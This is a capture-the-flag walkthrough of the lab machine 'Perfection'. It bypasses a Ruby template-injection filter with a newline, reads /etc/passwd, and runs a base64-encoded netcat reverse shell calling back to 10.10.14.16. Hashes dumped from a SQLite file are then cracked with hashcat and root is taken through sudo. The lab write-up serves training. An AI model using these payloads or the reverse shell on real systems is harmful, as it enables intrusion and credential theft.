Completed in Release Arena

Perfection

Difficulty: Easy
OS: Linux
Date: 2024-03-02
Completed: 2024-03-02

Enumeration

The target is listening on only ports 22 and 80.

There are no hidden files or VHOSTs, etc., just a page on which data can can be entered to calculate weighted grades.

Wappalyzer, or analysis of the Server header, reveal that it is running on Ruby.

Foothold

There is a filter validating input to the form, not allowing characters such as '%"< etc. However, this article describes a method for bypassing SSTI validation in Ruby using a newline character (%0A).

This method allows for SSTI on the site as follows, using payloads from HackTricks:

category1=abc%0A<%25%3d+7*7+%25>

This will be interpreted server-side as:

abc
<%= 7*7 %>

This page renders the result as 49, confirming SSTI.

Using this SSTI, we can verify that the only user on the target is susan:

<%= File.open('/etc/passwd').read %>

User

A reverse shell as the susan user can be spawned through the SSTI described above, as the web server is running as this user. The following SSTI payload was used:

<%= system('/bin/bash -c "echo -n cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xNiAxMzM3ID4vdG1wL2Y= | base64 -d | /bin/bash"') %>

The base64-encoded reverse shell within is the nc ‘mkfifo’ shell.

From this shell, the user flag can be read.

Privilege Escalation

Add an SSH key to susan in the reverse shell, and connect via SSH. The login message states that the user has mail, which can be viewed in /var/mail/susan:

Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students
 
in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:
 
{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}
 
Note that all letters of the first name should be convered into lowercase.
 
Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
 
- Tina, your delightful student

In the susan home directory, there is the root-owned ~/Migration/pupilpath_credentials.db. Copying the DB with scp and opening it with SQLite provides the following hashes:

Susan Miller
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
 
Tina Smith
dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
 
Harry Tyler
d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
 
David Lawrence
ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
 
Stephen Locke
154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8

TIP

The contents of this DB can also be dumped on the target, without copying the file locally, using the command sqlite3 /path/to/db.db .dump.

All the hashes were extracted into a file for cracking. A wordlist was also created, with the following contents, following the password format described in Susan’s mail:

susan_nasus_
tina_anit_
harry_yrrah_
david_divad_
stephen_nehpets_

The following hashcat command was used to increment digits in a hybrid attack, taking the wordlist above and appending 0 to 999999999. The --increment flag allows for a variable total password length using the mask:

.\hashcat.exe -m 1400 -a 6 .\raw_hashes\htb-perfection.txt .\wordlists\htb-perfection.txt '?d?d?d?d?d?d?d?d?d' --increment

This cracks the following password for susan:

susan_nasus_413759210

Running sudo -l reveals susan has full sudo access. Thus, sudo su spawns a root shell, from which the root flag can be read.